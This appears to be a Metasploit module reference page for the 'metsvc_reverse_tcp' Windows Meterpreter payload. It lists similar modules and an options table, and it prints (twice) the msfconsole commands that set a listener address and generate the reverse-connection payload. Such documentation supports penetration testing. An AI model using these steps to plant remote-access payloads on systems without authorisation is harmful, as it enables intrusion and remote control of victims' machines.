Windows Meterpreter Service, Reverse TCP Inline
Stub payload for interacting with a Meterpreter Service
Rank
- Normal
Authors
- hdm < hdm [at] metasploit.com >
Similar Modules
- payload/windows/adduser
- payload/windows/dllinject/bind_ipv6_tcp
- payload/windows/dllinject/bind_nonx_tcp
- payload/windows/dllinject/bind_tcp
- payload/windows/dllinject/find_tag
- payload/windows/dllinject/reverse_http
- payload/windows/dllinject/reverse_ipv6_http
- payload/windows/dllinject/reverse_ipv6_tcp
- payload/windows/dllinject/reverse_nonx_tcp
- payload/windows/dllinject/reverse_ord_tcp
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/metsvc_reverse_tcp
msf payload(metsvc_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(metsvc_reverse_tcp) > generate
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/metsvc_reverse_tcp
msf payload(metsvc_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(metsvc_reverse_tcp) > generate
Module Options
| EXITFUNC | Exit technique: thread, seh, none, process (default: process) |
| LHOST | The listen address |
| LPORT | The listen port (default: 4444) |
| AutoLoadStdapi | Automatically load the Stdapi extension |
| AutoRunScript | A script to run automatically on session creation. |
| AutoSystemInfo | Automatically capture system information on initialization. |
| EnableUnicodeEncoding | Automatically encode UTF-8 strings as hexadecimal |
| InitialAutoRunScript | An initial script to run on session creation (before AutoRunScript) |
| ReverseConnectRetries | The number of connection attempts to try before exiting the process |
| ReverseListenerBindAddress | The specific IP address to bind to on the local system |
| ReverseListenerComm | The specific communication channel to use for this listener |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
